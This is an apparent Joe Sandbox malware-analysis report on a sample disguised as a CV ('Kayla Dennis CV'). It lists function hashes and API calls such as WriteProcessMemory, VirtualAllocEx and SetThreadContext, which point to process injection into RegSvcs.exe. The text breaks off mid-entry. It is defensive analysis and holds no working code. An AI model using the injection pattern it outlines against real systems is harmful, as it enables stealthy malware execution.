Instruction ID: e5890bf3a349e796c528215206c3333a56ebbf44389f6780e29d03c7ea786059
Opcode Fuzzy Hash: ec4f2297bbcc19ba8b80f0d09630d97940a82055fedf5a4f908e307bca7a7fa9
Instruction Fuzzy Hash: 5D21EC72E04319AFDB21CFA8D9147EEBBF1EF49320F24844AC841B7642C7395A14CBA0

Function 07D7C950 Relevance: 1.6, APIs: 1, Instructions: 73
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07D7C9E8

Memory Dump Source

Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 87f41d55a4ebb503cb868525b11030ef2ae4c3a746b827cf16e610626a06adbb
Instruction ID: dc57e1725bdd4c79ed6f0474eaff7556cb39bdf0535726ec980b2b7170b193fe
Opcode Fuzzy Hash: 87f41d55a4ebb503cb868525b11030ef2ae4c3a746b827cf16e610626a06adbb
Instruction Fuzzy Hash: EC2146B19003499FCB10CFA9C985BEEBFF5FF48310F14842AE959A7251D7789944CBA0

Function 07D7C958 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07D7C9E8

Memory Dump Source

Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b5ccecbc1dc28917ddacbfda7959408b60096cc79bc1912c6303c238c6f11140
Instruction ID: bef243ae12a8e629947349576a251208da4995f8a24515b79b79d20717419d04
Opcode Fuzzy Hash: b5ccecbc1dc28917ddacbfda7959408b60096cc79bc1912c6303c238c6f11140
Instruction Fuzzy Hash: 6E2119B19003599FCB10DFAAC985BEEBBF5FF48310F10842AE959A7250D7789944CBA4

Function 07D7C7B8 Relevance: 1.6, APIs: 1, Instructions: 68
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07D7C83E

Memory Dump Source

Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c95d723af7b0100d00990fd8484cdc8851454a347cc30ae9b308010e69ff0197
Instruction ID: a045633ffe1a0ccac7acf860d46052811203f55cd4d07285706e324d9f3a24c3
Opcode Fuzzy Hash: c95d723af7b0100d00990fd8484cdc8851454a347cc30ae9b308010e69ff0197
Instruction Fuzzy Hash: 492139B1D002098FDB10DFAAC4857EEBBF4EF48310F14842AD559A7240D7789945CFA1

Function 07D7CA41 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07D7CAC8

Memory Dump Source

Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: a9ecb72aa83e4d2a127144d54a79c859176834b803d7a8b3f659b643c9e48e3a
Instruction ID: cd771254c1bbf1de47d16135ecb8c68d719c03673d441f8245a7af8b30a39a91
Opcode Fuzzy Hash: a9ecb72aa83e4d2a127144d54a79c859176834b803d7a8b3f659b643c9e48e3a
Instruction Fuzzy Hash: 102148B1C002599FCB10DFAAC985AEEFBF5FF48310F14882EE519A7250D7799945CBA0

Function 07D7C7C0 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07D7C83E

Memory Dump Source

Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ed0005801dbd3fb3d8dcc044e8e2a65e3677b22f767fd38dcf9ce7f9ff321c15
Instruction ID: 75d690ec403c3d3df32b50ce0ce7ead56af0e6e7d451e929af8e8031d6109154
Opcode Fuzzy Hash: ed0005801dbd3fb3d8dcc044e8e2a65e3677b22f767fd38dcf9ce7f9ff321c15
Instruction Fuzzy Hash: 6E2115B1D002098FDB10DFAAC5857AEFBF4EF88324F14842AD519A7240DB78A944CFA1

Function 07D7CA48 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07D7CAC8

Memory Dump Source

Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 6b80b93850f6c6aca8da2ae4d32dfd96fc9727171b9301b9ba8878090e272bc4
Instruction ID: 00b8c2e11d98cc41369e185b6f1a71cde2ab8583b5f3cc1f03a44d49e910f8ff
Opcode Fuzzy Hash: 6b80b93850f6c6aca8da2ae4d32dfd96fc9727171b9301b9ba8878090e272bc4
Instruction Fuzzy Hash: DA2137B1C003499FCB10DFAAC985AEEFBF5FF48310F10882AE519A7250D7789940CBA0

Function 018AE5E0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 018AE667

Memory Dump Source

Source File: 00000000.00000002.2129867289.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18a0000_Kayla Dennis CV.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 34067b7655d28f2d3c554014916bb9f00f6754f19d3fa579d5d5fa5b314d0acf
Instruction ID: e29704b39077f536c85ad2528db788034548411a76978d7dbeafb9086373faa4
Opcode Fuzzy Hash: 34067b7655d28f2d3c554014916bb9f00f6754f19d3fa579d5d5fa5b314d0acf
Instruction Fuzzy Hash: 5821D3B59002489FDB10CFAAD984ADEFFF9FB48310F14841AE918A3350D378A944CFA5

Function 07D7C890 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07D7C906

Memory Dump Source

Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 11d8882fd748312f4bf8990df69ddfa46e8d7e4575125bed2a36a16ede3c0b05
Instruction ID: 2e046696c82f3a8e476180dd0fafcaaf6bd1afe3baa68a5069ca955ee6232d1b
Opcode Fuzzy Hash: 11d8882fd748312f4bf8990df69ddfa46e8d7e4575125bed2a36a16ede3c0b05
Instruction Fuzzy Hash: 551147B19002499FCB10DFAAD845BEFBFF9EF48320F148419E519A7250DB799980CBA1

Function 07D7C709 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 07D7C772

Memory Dump Source

Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 571b3c2c6f1a19c8f0bc251fc5ba780d93a4b483f12e44102342a29f79ac83a2
Instruction ID: 6f5556efde64d7b74edb748e346fe81dbdbc038db0ee372465371ba0bef29fb2
Opcode Fuzzy Hash: 571b3c2c6f1a19c8f0bc251fc5ba780d93a4b483f12e44102342a29f79ac83a2
Instruction Fuzzy Hash: 5A1149B19042498FCB20DFAAC4457DEFFF4AF89320F148419D559A7250DB79A944CFA1

Function 07D7C898 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07D7C906

Memory Dump Source

Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e43e534b4b89c0e9ebd8c7c6892013668b0cc4f29266168ab86569d92e6f91a2
Instruction ID: 924845ab665905c6e95d5904a07d04f71abc39f89480aa7d716c6de23af7ea13
Opcode Fuzzy Hash: e43e534b4b89c0e9ebd8c7c6892013668b0cc4f29266168ab86569d92e6f91a2
Instruction Fuzzy Hash: D21126B19002499FCB10DFAAC845AEFFFF5EF48320F148419E519A7250D779A540CBA0

Function 07D7C710 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 07D7C772

Memory Dump Source

Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 274bdc3894550b3764419309684c2496701d08078c97ca78189ec5351190837d
Instruction ID: 1043880dc3c8f4911c9d48a0935d334528ac1d85426e2d76b3c10936dd993b0b
Opcode Fuzzy Hash: 274bdc3894550b3764419309684c2496701d08078c97ca78189ec5351190837d
Instruction Fuzzy Hash: 4E1136B1D002498FCB20DFAAC4457AFFBF9EF88320F248419D519A7250DB79A944CFA0

Function 018AC300 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 018AC366

Memory Dump Source

Source File: 00000000.00000002.2129867289.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18a0000_Kayla Dennis CV.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: dde6ae0b11a0bc9e53fd5d60ece258a921c74c5451494bbc4482fe5032364d9e
Instruction ID: c48cc50b16ad78cbcd5c7481465afd87cfa7e6570d1efde18497b8df2064dccf
Opcode Fuzzy Hash: dde6ae0b11a0bc9e53fd5d60ece258a921c74c5451494bbc4482fe5032364d9e
Instruction Fuzzy Hash: A2110FB5C003498FDB10DF9AC444B9EFBF4AB89310F10841AD528B7210C379A645CFA1

Function 0B1D1249 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0B1D12AD

Memory Dump Source

Source File: 00000000.00000002.2143416006.000000000B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B1D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b1d0000_Kayla Dennis CV.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: f5b4e3c81ab14d5ad6e0b88fb07eca36feee56ecea21ee573607599336039164
Instruction ID: 44df949d9d7b83fe7dab45813276ca6a24251b1ec0a36ad29cb39993bf4934a5
Opcode Fuzzy Hash: f5b4e3c81ab14d5ad6e0b88fb07eca36feee56ecea21ee573607599336039164
Instruction Fuzzy Hash: 6711F5B58003499FCB10DF9AD545BDEBBF8EB48320F248459D518B7210D379A944CFA1

Function 0B1D1250 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0B1D12AD

Memory Dump Source

Source File: 00000000.00000002.2143416006.000000000B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B1D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b1d0000_Kayla Dennis CV.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 975d2d28b4a2ee687fd295661318005a94fc580c8dadbb7c7356552ff2017f49
Instruction ID: 79d408189060453d7b950837831714caf8f3bface5d5064fe98e06c96a884493
Opcode Fuzzy Hash: 975d2d28b4a2ee687fd295661318005a94fc580c8dadbb7c7356552ff2017f49
Instruction Fuzzy Hash: 2A11D3B58003499FDB10DF9AD585BDEFBF8EB48320F208459D518B7210C379A544CFA1

Function 0185D1EC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2129066060.000000000185D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0185D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_185d000_Kayla Dennis CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 829ccdecb547d28e82fd29f7e1c2f322972912c6365326ae5aa4679e92b239bb
Instruction ID: df933aa42b313c7df112e9a1a99a7ce0a3e6fa7be08b1478459b60439e9f2b98
Opcode Fuzzy Hash: 829ccdecb547d28e82fd29f7e1c2f322972912c6365326ae5aa4679e92b239bb
Instruction Fuzzy Hash: 4B210071504204EFDB45DF98C5C0B26BB65FB88364F20C66DDC098B356C37AE906CAA1

Function 0185D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2129066060.000000000185D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0185D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_185d000_Kayla Dennis CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1e11ff865b05dc986da6486fd1f75adb8bca501e83c666fc7e90606eb5f953c
Instruction ID: fb28a4f884e484f307c278db8434a790e7566abd581b26883278c9df763dbd53
Opcode Fuzzy Hash: f1e11ff865b05dc986da6486fd1f75adb8bca501e83c666fc7e90606eb5f953c
Instruction Fuzzy Hash: 39210071604204DFDB55DF68D9C0B26BF65EB88314F20C669DD0A8B356C33AD507CA62

Function 0185D005 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2129066060.000000000185D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0185D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_185d000_Kayla Dennis CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b5e79c735fc070dab10e739e391893253070069c1ae96aa3f5c515fa7539435
Instruction ID: bfeaa46c7393c974b5d7926b7345fdde2d0778611ef9278c1824988866e7fedf
Opcode Fuzzy Hash: 9b5e79c735fc070dab10e739e391893253070069c1ae96aa3f5c515fa7539435
Instruction Fuzzy Hash: BB2192755093808FDB03CF24D994715BF71EB46314F28C6EADC498B6A7C33A950ACB62

Function 0185D1E7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2129066060.000000000185D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0185D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_185d000_Kayla Dennis CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: b8d71c3119b7f00c5f7127d596d5300d28826d782e1f9065d376dc90e7d8a795
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: DA11DD75504280DFDB02CF54D5C4B15BFA2FB88324F24C6ADDC498B656C33AE54ACBA2

Function 0184D759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2128078778.000000000184D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0184D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_184d000_Kayla Dennis CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73a7731f75ff6f8f83b3684f8ccda204cfba67e9c77cb8d550dc65771b40cf05
Instruction ID: ec2df6ff85a7858fd7021c5270d2014f4153f7f1e699aa4138dd6295a744dd9e
Opcode Fuzzy Hash: 73a7731f75ff6f8f83b3684f8ccda204cfba67e9c77cb8d550dc65771b40cf05
Instruction Fuzzy Hash: 7B01FC310043889BE720CA99CD84B66BF9CEF65324F18C516ED084A247C7799540C671

Function 0184D758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2128078778.000000000184D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0184D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_184d000_Kayla Dennis CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 685f106f81c0b544d42c11ab76abad5b91d5c01e9b6e076175de813605ae8cfe
Instruction ID: 0a7554ef5d76cbb4cf54811a1e5a4803d32440b68b0fb55c65d9b2617d533614
Opcode Fuzzy Hash: 685f106f81c0b544d42c11ab76abad5b91d5c01e9b6e076175de813605ae8cfe
Instruction Fuzzy Hash: 3FF062714043889EE7218A1ADD84B62FFA8EF65724F18C55AED484A297C3799844CAB1

Non-executed Functions

Function 07D7A3CB Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed2dcef17117f14ac8290467d06267833c2509ba0bccc7bec3cce377be66042f
Instruction ID: 67e422e8fa841ebe6c41c152c33d65ecf3c73a1d7876149f91c66d6f818065c2
Opcode Fuzzy Hash: ed2dcef17117f14ac8290467d06267833c2509ba0bccc7bec3cce377be66042f
Instruction Fuzzy Hash: 31E1F5B4E042598FDB14CFA8C5809AEFBB2BF89305F64C169D404AB356D731AD81CFA1

Function 07D79FA0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95863037cabc3dc13b78a579e44cac40fdb13a3ec982660955560764cf4613fe
Instruction ID: 840fab893a0c5f3d907f2fdf9b24411ca257ad1ab614049709c2169aa677d191
Opcode Fuzzy Hash: 95863037cabc3dc13b78a579e44cac40fdb13a3ec982660955560764cf4613fe
Instruction Fuzzy Hash: 2AE1F5B4E141598FDB14DFA8C5809AEFBB2FF89305F24C169D814AB356D731A981CFA0

Function 07D7BEE8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29e131b6275b7189a2d661b3cf44c40ade62c0efc1b72598ae3b8caa1a4362ad
Instruction ID: 2c8e15a2ce55154c5526a99f5d404614824c625a7e6f8b424f49e39b410afb54
Opcode Fuzzy Hash: 29e131b6275b7189a2d661b3cf44c40ade62c0efc1b72598ae3b8caa1a4362ad
Instruction Fuzzy Hash: 49E1E9B4E141598FDB14CFA8C5809AEFBB6FF89305F248169D818AB355D731AD81CFA0

Function 07D7AC48 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 192188fbd8f93f6cdf1a11767a1746baa6af455f15aecc2c5a1c682a7354a04a
Instruction ID: 18562e1e7f5f3534270285f998dbdf31bfbabb94210f959dd1a3303deaed4ff9
Opcode Fuzzy Hash: 192188fbd8f93f6cdf1a11767a1746baa6af455f15aecc2c5a1c682a7354a04a
Instruction Fuzzy Hash: E0E1E5B4E141198FDB14DFA8C5809AEFBB2FF89305F24C169D414AB356D731A981CFA1

Function 07D7A810 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab308731ba43bc606491174d78b0057dcf4139d10599780eaef17c66c4043334
Instruction ID: 95de88dbe635812a72cd283ff601a62e87b284931cea1ab313bf714a94544a5f
Opcode Fuzzy Hash: ab308731ba43bc606491174d78b0057dcf4139d10599780eaef17c66c4043334
Instruction Fuzzy Hash: 8FE1F6B4E101198FDB14CFA8C6809AEFBB2FF89305F64C169D414AB356D731A981CFA1

Function 07D716E7 Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31f3e76e9aeae453e24ba857db3c05854cf9dae1957fc4549109e65ce19213aa
Instruction ID: 804fe6fe1a817cb732501009e8be260afe55763731293dd93727107f3787ff8e
Opcode Fuzzy Hash: 31f3e76e9aeae453e24ba857db3c05854cf9dae1957fc4549109e65ce19213aa
Instruction Fuzzy Hash: 54E12631D2075A8ADB21EB64D950A9DF7B1FF95300F10CB9AD50A77224EF706AC8CB91

Function 07D716F8 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01832696b263e679825758d19d77752e8f766200774ffca570f599f6ff28e954
Instruction ID: cf6febf7ed0d56635cb079dd8370f450bebd0cda137c0c59d173e51afa09f1fc
Opcode Fuzzy Hash: 01832696b263e679825758d19d77752e8f766200774ffca570f599f6ff28e954
Instruction Fuzzy Hash: 63D12531D2075A8ADB20EF64D950A9DB771FF95300F50CB9AE50A77224EF706AC8CB81

Function 07D7A800 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8143049d8cacd0ffa92c1afcdbaafeb88f1aeafeb41f3c676b0e3ad93e1792fa
Instruction ID: 66cb3739b28df9d2e4b8ebc471f88458c8f234e4dfe7efc702fcb2eb0ee99a12
Opcode Fuzzy Hash: 8143049d8cacd0ffa92c1afcdbaafeb88f1aeafeb41f3c676b0e3ad93e1792fa
Instruction Fuzzy Hash: 61510AB0E142198FDB14CFA9C9805AEFBF2FF89301F64C16AD408A7256D7359941CFA1

Analysis Process: RegSvcs.exePID: 7364, Parent PID: 6300COMMON

Execution Graph

Execution Coverage:	21.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	8
Total number of Limit Nodes:	0

Executed Functions

Function 012FF138 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MoveFileExW.KERNELBASE(?,?,?,?), ref: 012FF2B5

Strings

Hnq, xrefs: 012FF193

Memory Dump Source

Source File: 0000000B.00000002.3285141788.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_12f0000_RegSvcs.jbxd

Similarity

API ID: FileMove
String ID: Hnq
API String ID: 3562171763-2896580000
Opcode ID: b60eaf09c55f0125c937ed60ac6f604611f18d15b62cf20d306b3eae7d4c4929
Instruction ID: 38b94750ec63272b073afa3090e0249a4bb6eef63c7b5af4df15102b43f57b6d
Opcode Fuzzy Hash: b60eaf09c55f0125c937ed60ac6f604611f18d15b62cf20d306b3eae7d4c4929
Instruction Fuzzy Hash: 0E511575E01249DFCB14CFA9DA84AAEFBF2BF89300F24806AD509AB354D7349946CB50

Function 012FBB48 Relevance: 1.6, APIs: 1, Instructions: 111COMMON

Download Yara Rule

APIs

MoveFileExW.KERNELBASE(?,?,?,?), ref: 012FF2B5

Memory Dump Source

Source File: 0000000B.00000002.3285141788.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_12f0000_RegSvcs.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: a3c8103e5401c7828abad7d9a10ad0bd5c9fa0d0b58f739f31f3fd2072ba40e3
Instruction ID: f78cdd6b463eb7cc69e0fa025d98c1634618555be4e26fe38938ab4c03fab45e
Opcode Fuzzy Hash: a3c8103e5401c7828abad7d9a10ad0bd5c9fa0d0b58f739f31f3fd2072ba40e3
Instruction Fuzzy Hash: 864189B9D102589FCB10CFA9D984A9EFBF1BB49310F24802AE918B7324D374A945CF94

Function 0121D044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3283997731.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_121d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13dff36922560e620d13b38420839d3b67c37a5de9a8d0bfa61000d8972918af
Instruction ID: 42eca0166f08a85b4b9bf96e621cec348d50b77a91686de4e6be1b777804fe89
Opcode Fuzzy Hash: 13dff36922560e620d13b38420839d3b67c37a5de9a8d0bfa61000d8972918af
Instruction Fuzzy Hash: 0C213771514208DFCB15CF68C9C8B26BBA5FB94314F20C56DE9490B35AC77BD846CA61

Function 0121D03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3283997731.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_121d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: d1131925a4083e95f1a06211554e7339219e9b1c4607e38ddd66497808f8847e
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: 3911DD75504288CFDB12CF68C9C8B15BFA2FB84314F24C6A9D9494B256C33AD44ACF62

Analysis Process: lyKbfEsVYfQfU.exePID: 7428, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	11.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	185
Total number of Limit Nodes:	13

Executed Functions

Function 0150E398 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0150E416
GetCurrentThread.KERNEL32 ref: 0150E453
GetCurrentProcess.KERNEL32 ref: 0150E490
GetCurrentThreadId.KERNEL32 ref: 0150E4E9

Memory Dump Source

Source File: 0000000C.00000002.2222939091.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_lyKbfEsVYfQfU.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 6e725e01e54a2be18796d180e71d58895471954f17f0271705431f3f810b5a07
